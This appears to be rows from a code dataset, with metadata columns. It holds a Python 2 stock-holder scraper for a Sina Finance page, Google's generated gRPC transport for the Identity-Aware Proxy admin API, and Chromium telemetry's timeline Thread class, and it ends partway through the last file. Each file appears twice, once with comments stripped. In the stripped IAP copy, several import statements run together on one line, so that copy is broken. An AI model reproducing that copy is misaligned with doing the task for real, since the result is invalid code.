desired=set([u'\u622a\u81f3\u65e5\u671f','1','2','3','4','5','6','7','8','9','10'])
def parseData(code):
global req
url=req%code
rep=urllib2.urlopen(url)
t=3
while True:
time.sleep(t)
data=rep.read()
soup=BeautifulSoup(data,from_encoding='gb18030')
if soup.find(id='Table1') is not None:
break
else:
t+=60
trs=soup.find(id='Table1').tbody.find_all('tr')
final=[]
res=[]
for tr in trs:
if tr.td.get_text()==u'\u622a\u81f3\u65e5\u671f':
if len(res)>0:
t=res[0]
final.append('\n'.join([code+'\001'+l+'\001'+t for l in res[1:]]))
res=[]
if tr.td.get_text().strip() in desired and len(tr.find_all('td'))>1:
res.append(tr.find_all('td')[1].get_text().strip())
if len(res)>0:
t=res[0]
final.append('\n'.join([code+'\001'+l+'\001'+t for l in res[1:]]))
return '\n'.join(final)
if __name__=='__main__':
f=file(sys.argv[1])
output=file(sys.argv[2],'w')
while True:
line=f.readline()
if len(line)==0:
break
print line.strip()
sys.stdout.flush()
forout=parseData(line.strip()).encode('utf8')
if len(forout)>0:
output.write(forout+'\n')
output.flush()
output.close()
| 24.851852 | 103 | 0.64307 | import sys
import time
import urllib2
from bs4 import BeautifulSoup
req='http://vip.stock.finance.sina.com.cn/corp/go.php/vCI_StockHolder/stockid/%s/displaytype/30.phtml';
desired=set([u'\u622a\u81f3\u65e5\u671f','1','2','3','4','5','6','7','8','9','10'])
def parseData(code):
global req
url=req%code
rep=urllib2.urlopen(url)
t=3
while True:
time.sleep(t)
data=rep.read()
soup=BeautifulSoup(data,from_encoding='gb18030')
if soup.find(id='Table1') is not None:
break
else:
t+=60
trs=soup.find(id='Table1').tbody.find_all('tr')
final=[]
res=[]
for tr in trs:
if tr.td.get_text()==u'\u622a\u81f3\u65e5\u671f':
if len(res)>0:
t=res[0]
final.append('\n'.join([code+'\001'+l+'\001'+t for l in res[1:]]))
res=[]
if tr.td.get_text().strip() in desired and len(tr.find_all('td'))>1:
res.append(tr.find_all('td')[1].get_text().strip())
if len(res)>0:
t=res[0]
final.append('\n'.join([code+'\001'+l+'\001'+t for l in res[1:]]))
return '\n'.join(final)
if __name__=='__main__':
f=file(sys.argv[1])
output=file(sys.argv[2],'w')
while True:
line=f.readline()
if len(line)==0:
break
print line.strip()
sys.stdout.flush()
forout=parseData(line.strip()).encode('utf8')
if len(forout)>0:
output.write(forout+'\n')
output.flush()
output.close()
| false | true |
1c4a6d92ab4a6582c87d304e6fe65c32e55535a7 | 17,478 | py | Python | google/cloud/iap/v1/iap-v1-py/google/cloud/iap_v1/services/identity_aware_proxy_admin_service/transports/grpc_asyncio.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/cloud/iap/v1/iap-v1-py/google/cloud/iap_v1/services/identity_aware_proxy_admin_service/transports/grpc_asyncio.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/cloud/iap/v1/iap-v1-py/google/cloud/iap_v1/services/identity_aware_proxy_admin_service/transports/grpc_asyncio.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.iap_v1.types import service
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from .base import IdentityAwareProxyAdminServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import IdentityAwareProxyAdminServiceGrpcTransport
class IdentityAwareProxyAdminServiceGrpcAsyncIOTransport(IdentityAwareProxyAdminServiceTransport):
"""gRPC AsyncIO backend transport for IdentityAwareProxyAdminService.
APIs for Identity-Aware Proxy Admin configurations.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'iap.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'iap.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def set_iam_policy(self) -> Callable[
[iam_policy_pb2.SetIamPolicyRequest],
Awaitable[policy_pb2.Policy]]:
r"""Return a callable for the set iam policy method over gRPC.
Sets the access control policy for an Identity-Aware Proxy
protected resource. Replaces any existing policy. More
information about managing access via IAP can be found at:
https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api
Returns:
Callable[[~.SetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'set_iam_policy' not in self._stubs:
self._stubs['set_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/SetIamPolicy',
request_serializer=iam_policy_pb2.SetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs['set_iam_policy']
@property
def get_iam_policy(self) -> Callable[
[iam_policy_pb2.GetIamPolicyRequest],
Awaitable[policy_pb2.Policy]]:
r"""Return a callable for the get iam policy method over gRPC.
Gets the access control policy for an Identity-Aware Proxy
protected resource. More information about managing access via
IAP can be found at:
https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api
Returns:
Callable[[~.GetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_iam_policy' not in self._stubs:
self._stubs['get_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/GetIamPolicy',
request_serializer=iam_policy_pb2.GetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs['get_iam_policy']
@property
def test_iam_permissions(self) -> Callable[
[iam_policy_pb2.TestIamPermissionsRequest],
Awaitable[iam_policy_pb2.TestIamPermissionsResponse]]:
r"""Return a callable for the test iam permissions method over gRPC.
Returns permissions that a caller has on the Identity-Aware
Proxy protected resource. More information about managing access
via IAP can be found at:
https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api
Returns:
Callable[[~.TestIamPermissionsRequest],
Awaitable[~.TestIamPermissionsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'test_iam_permissions' not in self._stubs:
self._stubs['test_iam_permissions'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/TestIamPermissions',
request_serializer=iam_policy_pb2.TestIamPermissionsRequest.SerializeToString,
response_deserializer=iam_policy_pb2.TestIamPermissionsResponse.FromString,
)
return self._stubs['test_iam_permissions']
@property
def get_iap_settings(self) -> Callable[
[service.GetIapSettingsRequest],
Awaitable[service.IapSettings]]:
r"""Return a callable for the get iap settings method over gRPC.
Gets the IAP settings on a particular IAP protected
resource.
Returns:
Callable[[~.GetIapSettingsRequest],
Awaitable[~.IapSettings]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_iap_settings' not in self._stubs:
self._stubs['get_iap_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/GetIapSettings',
request_serializer=service.GetIapSettingsRequest.serialize,
response_deserializer=service.IapSettings.deserialize,
)
return self._stubs['get_iap_settings']
@property
def update_iap_settings(self) -> Callable[
[service.UpdateIapSettingsRequest],
Awaitable[service.IapSettings]]:
r"""Return a callable for the update iap settings method over gRPC.
Updates the IAP settings on a particular IAP protected resource.
It replaces all fields unless the ``update_mask`` is set.
Returns:
Callable[[~.UpdateIapSettingsRequest],
Awaitable[~.IapSettings]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'update_iap_settings' not in self._stubs:
self._stubs['update_iap_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/UpdateIapSettings',
request_serializer=service.UpdateIapSettingsRequest.serialize,
response_deserializer=service.IapSettings.deserialize,
)
return self._stubs['update_iap_settings']
def close(self):
return self.grpc_channel.close()
__all__ = (
'IdentityAwareProxyAdminServiceGrpcAsyncIOTransport',
)
| 46.360743 | 98 | 0.639318 | import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 from google.api_core import grpc_helpers_async from google.auth import credentials as ga_credentials from google.auth.transport.grpc import SslCredentials import packaging.version
import grpc from grpc.experimental import aio
from google.cloud.iap_v1.types import service
from google.iam.v1 import iam_policy_pb2 from google.iam.v1 import policy_pb2 from .base import IdentityAwareProxyAdminServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import IdentityAwareProxyAdminServiceGrpcTransport
class IdentityAwareProxyAdminServiceGrpcAsyncIOTransport(IdentityAwareProxyAdminServiceTransport):
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'iap.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'iap.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
credentials = False
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
return self._grpc_channel
@property
def set_iam_policy(self) -> Callable[
[iam_policy_pb2.SetIamPolicyRequest],
Awaitable[policy_pb2.Policy]]:
if 'set_iam_policy' not in self._stubs:
self._stubs['set_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/SetIamPolicy',
request_serializer=iam_policy_pb2.SetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs['set_iam_policy']
@property
def get_iam_policy(self) -> Callable[
[iam_policy_pb2.GetIamPolicyRequest],
Awaitable[policy_pb2.Policy]]:
if 'get_iam_policy' not in self._stubs:
self._stubs['get_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/GetIamPolicy',
request_serializer=iam_policy_pb2.GetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs['get_iam_policy']
@property
def test_iam_permissions(self) -> Callable[
[iam_policy_pb2.TestIamPermissionsRequest],
Awaitable[iam_policy_pb2.TestIamPermissionsResponse]]:
if 'test_iam_permissions' not in self._stubs:
self._stubs['test_iam_permissions'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/TestIamPermissions',
request_serializer=iam_policy_pb2.TestIamPermissionsRequest.SerializeToString,
response_deserializer=iam_policy_pb2.TestIamPermissionsResponse.FromString,
)
return self._stubs['test_iam_permissions']
@property
def get_iap_settings(self) -> Callable[
[service.GetIapSettingsRequest],
Awaitable[service.IapSettings]]:
if 'get_iap_settings' not in self._stubs:
self._stubs['get_iap_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/GetIapSettings',
request_serializer=service.GetIapSettingsRequest.serialize,
response_deserializer=service.IapSettings.deserialize,
)
return self._stubs['get_iap_settings']
@property
def update_iap_settings(self) -> Callable[
[service.UpdateIapSettingsRequest],
Awaitable[service.IapSettings]]:
if 'update_iap_settings' not in self._stubs:
self._stubs['update_iap_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/UpdateIapSettings',
request_serializer=service.UpdateIapSettingsRequest.serialize,
response_deserializer=service.IapSettings.deserialize,
)
return self._stubs['update_iap_settings']
def close(self):
return self.grpc_channel.close()
__all__ = (
'IdentityAwareProxyAdminServiceGrpcAsyncIOTransport',
)
| true | true |
1c4a6da9e32f2fa4fbbdec55c0b23a5795f8a579 | 9,407 | py | Python | tools/telemetry/telemetry/timeline/thread.py | kjthegod/chromium | cf940f7f418436b77e15b1ea23e6fa100ca1c91a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2019-11-28T10:46:52.000Z | 2019-11-28T10:46:52.000Z | tools/telemetry/telemetry/timeline/thread.py | kjthegod/chromium | cf940f7f418436b77e15b1ea23e6fa100ca1c91a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | tools/telemetry/telemetry/timeline/thread.py | kjthegod/chromium | cf940f7f418436b77e15b1ea23e6fa100ca1c91a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2 | 2015-03-27T11:15:39.000Z | 2016-08-17T14:19:56.000Z | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import telemetry.timeline.async_slice as async_slice_module
import telemetry.timeline.event_container as event_container
import telemetry.timeline.flow_event as flow_event_module
import telemetry.timeline.sample as sample_module
import telemetry.timeline.slice as slice_module
class Thread(event_container.TimelineEventContainer):
''' A Thread stores all the trace events collected for a particular
thread. We organize the synchronous slices on a thread by "subrows," where
subrow 0 has all the root slices, subrow 1 those nested 1 deep, and so on.
The asynchronous slices are stored in an AsyncSliceGroup object.
'''
def __init__(self, process, tid):
super(Thread, self).__init__('thread %s' % tid, parent=process)
self.tid = tid
self._async_slices = []
self._flow_events = []
self._samples = []
self._toplevel_slices = []
self._all_slices = []
# State only valid during import.
self._open_slices = []
self._newly_added_slices = []
@property
def toplevel_slices(self):
return self._toplevel_slices
@property
def all_slices(self):
return self._all_slices
@property
def samples(self):
return self._samples
@property
def async_slices(self):
return self._async_slices
@property
def open_slice_count(self):
return len(self._open_slices)
def IterChildContainers(self):
return
yield # pylint: disable=W0101
def IterEventsInThisContainer(self, event_type_predicate, event_predicate):
if event_type_predicate(slice_module.Slice):
for s in self._newly_added_slices:
if event_predicate(s):
yield s
for s in self._all_slices:
if event_predicate(s):
yield s
if event_type_predicate(async_slice_module.AsyncSlice):
for async_slice in self._async_slices:
if event_predicate(async_slice):
yield async_slice
for sub_slice in async_slice.IterEventsInThisContainerRecrusively():
if event_predicate(sub_slice):
yield sub_slice
if event_type_predicate(flow_event_module.FlowEvent):
for flow_event in self._flow_events:
if event_predicate(flow_event):
yield flow_event
if event_type_predicate(sample_module.Sample):
for sample in self._samples:
if event_predicate(sample):
yield sample
def AddSample(self, category, name, timestamp, args=None):
if len(self._samples) and timestamp < self._samples[-1].start:
raise ValueError(
'Samples must be added in increasing timestamp order')
sample = sample_module.Sample(self,
category, name, timestamp, args=args)
self._samples.append(sample)
def AddAsyncSlice(self, async_slice):
self._async_slices.append(async_slice)
def AddFlowEvent(self, flow_event):
self._flow_events.append(flow_event)
def BeginSlice(self, category, name, timestamp, thread_timestamp=None,
args=None):
"""Opens a new slice for the thread.
Calls to beginSlice and endSlice must be made with
non-monotonically-decreasing timestamps.
* category: Category to which the slice belongs.
* name: Name of the slice to add.
* timestamp: The timetsamp of the slice, in milliseconds.
* thread_timestamp: Thread specific clock (scheduled) timestamp of the
slice, in milliseconds.
* args: Arguments associated with
Returns newly opened slice
"""
if len(self._open_slices) > 0 and timestamp < self._open_slices[-1].start:
raise ValueError(
'Slices must be added in increasing timestamp order')
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
self._open_slices.append(new_slice)
new_slice.did_not_finish = True
self.PushSlice(new_slice)
return new_slice
def EndSlice(self, end_timestamp, end_thread_timestamp=None):
""" Ends the last begun slice in this group and pushes it onto the slice
array.
* end_timestamp: Timestamp when the slice ended in milliseconds
* end_thread_timestamp: Timestamp when the scheduled time of the slice ended
in milliseconds
returns completed slice.
"""
if not len(self._open_slices):
raise ValueError(
'EndSlice called without an open slice')
curr_slice = self._open_slices.pop()
if end_timestamp < curr_slice.start:
raise ValueError(
'Slice %s end time is before its start.' % curr_slice.name)
curr_slice.duration = end_timestamp - curr_slice.start
if end_thread_timestamp != None:
if curr_slice.thread_start == None:
raise ValueError(
'EndSlice with thread_timestamp called on open slice without ' +
'thread_timestamp')
curr_slice.thread_duration = (end_thread_timestamp -
curr_slice.thread_start)
curr_slice.did_not_finish = False
return curr_slice
def PushCompleteSlice(self, category, name, timestamp, duration,
thread_timestamp, thread_duration, args=None):
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
if duration == None:
new_slice.did_not_finish = True
else:
new_slice.duration = duration
new_slice.thread_duration = thread_duration
self.PushSlice(new_slice)
return new_slice
def PushSlice(self, new_slice):
self._newly_added_slices.append(new_slice)
return new_slice
def AutoCloseOpenSlices(self, max_timestamp, max_thread_timestamp):
for s in self._newly_added_slices:
if s.did_not_finish:
s.duration = max_timestamp - s.start
assert s.duration >= 0
if s.thread_start != None:
s.thread_duration = max_thread_timestamp - s.thread_start
assert s.thread_duration >= 0
self._open_slices = []
def IsTimestampValidForBeginOrEnd(self, timestamp):
if not len(self._open_slices):
return True
return timestamp >= self._open_slices[-1].start
def FinalizeImport(self):
self._BuildSliceSubRows()
def _BuildSliceSubRows(self):
'''This function works by walking through slices by start time.
The basic idea here is to insert each slice as deep into the subrow
list as it can go such that every subslice is fully contained by its
parent slice.
Visually, if we start with this:
0: [ a ]
1: [ b ]
2: [c][d]
To place this slice:
[e]
We first check row 2's last item, [d]. [e] wont fit into [d] (they dont
even intersect). So we go to row 1. That gives us [b], and [d] wont fit
into that either. So, we go to row 0 and its last slice, [a]. That can
completely contain [e], so that means we should add [e] as a subslice
of [a]. That puts it on row 1, yielding:
0: [ a ]
1: [ b ][e]
2: [c][d]
If we then get this slice:
[f]
We do the same deepest-to-shallowest walk of the subrows trying to fit
it. This time, it doesn't fit in any open slice. So, we simply append
it to row 0 (a root slice):
0: [ a ] [f]
1: [ b ][e]
'''
def CompareSlices(s1, s2):
if s1.start == s2.start:
# Break ties by having the slice with the greatest
# end timestamp come first.
return cmp(s2.end, s1.end)
return cmp(s1.start, s2.start)
assert len(self._toplevel_slices) == 0
assert len(self._all_slices) == 0
if not len(self._newly_added_slices):
return
self._all_slices.extend(self._newly_added_slices)
sorted_slices = sorted(self._newly_added_slices, cmp=CompareSlices)
root_slice = sorted_slices[0]
self._toplevel_slices.append(root_slice)
for s in sorted_slices[1:]:
if not self._AddSliceIfBounds(root_slice, s):
root_slice = s
self._toplevel_slices.append(root_slice)
self._newly_added_slices = []
def _AddSliceIfBounds(self, root, child):
''' Adds a child slice to a root slice its proper row.
Return False if the child slice is not in the bounds
of the root slice.
Because we know that the start time of child is >= the start time
of all other slices seen so far, we can just check the last slice
of each row for bounding.
'''
# The source trace data is in microseconds but we store it as milliseconds
# in floating-point. Since we can't represent micros as millis perfectly,
# two end=start+duration combos that should be the same will be slightly
# different. Round back to micros to ensure equality below.
child_end_micros = round(child.end * 1000)
root_end_micros = round(root.end * 1000)
if child.start >= root.start and child_end_micros <= root_end_micros:
if len(root.sub_slices) > 0:
if self._AddSliceIfBounds(root.sub_slices[-1], child):
return True
child.parent_slice = root
root.AddSubSlice(child)
return True
return False
| 35.90458 | 80 | 0.672691 | import telemetry.timeline.async_slice as async_slice_module
import telemetry.timeline.event_container as event_container
import telemetry.timeline.flow_event as flow_event_module
import telemetry.timeline.sample as sample_module
import telemetry.timeline.slice as slice_module
class Thread(event_container.TimelineEventContainer):
def __init__(self, process, tid):
super(Thread, self).__init__('thread %s' % tid, parent=process)
self.tid = tid
self._async_slices = []
self._flow_events = []
self._samples = []
self._toplevel_slices = []
self._all_slices = []
self._open_slices = []
self._newly_added_slices = []
@property
def toplevel_slices(self):
return self._toplevel_slices
@property
def all_slices(self):
return self._all_slices
@property
def samples(self):
return self._samples
@property
def async_slices(self):
return self._async_slices
@property
def open_slice_count(self):
return len(self._open_slices)
def IterChildContainers(self):
return
yield
def IterEventsInThisContainer(self, event_type_predicate, event_predicate):
if event_type_predicate(slice_module.Slice):
for s in self._newly_added_slices:
if event_predicate(s):
yield s
for s in self._all_slices:
if event_predicate(s):
yield s
if event_type_predicate(async_slice_module.AsyncSlice):
for async_slice in self._async_slices:
if event_predicate(async_slice):
yield async_slice
for sub_slice in async_slice.IterEventsInThisContainerRecrusively():
if event_predicate(sub_slice):
yield sub_slice
if event_type_predicate(flow_event_module.FlowEvent):
for flow_event in self._flow_events:
if event_predicate(flow_event):
yield flow_event
if event_type_predicate(sample_module.Sample):
for sample in self._samples:
if event_predicate(sample):
yield sample
def AddSample(self, category, name, timestamp, args=None):
if len(self._samples) and timestamp < self._samples[-1].start:
raise ValueError(
'Samples must be added in increasing timestamp order')
sample = sample_module.Sample(self,
category, name, timestamp, args=args)
self._samples.append(sample)
def AddAsyncSlice(self, async_slice):
self._async_slices.append(async_slice)
def AddFlowEvent(self, flow_event):
self._flow_events.append(flow_event)
def BeginSlice(self, category, name, timestamp, thread_timestamp=None,
args=None):
if len(self._open_slices) > 0 and timestamp < self._open_slices[-1].start:
raise ValueError(
'Slices must be added in increasing timestamp order')
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
self._open_slices.append(new_slice)
new_slice.did_not_finish = True
self.PushSlice(new_slice)
return new_slice
def EndSlice(self, end_timestamp, end_thread_timestamp=None):
if not len(self._open_slices):
raise ValueError(
'EndSlice called without an open slice')
curr_slice = self._open_slices.pop()
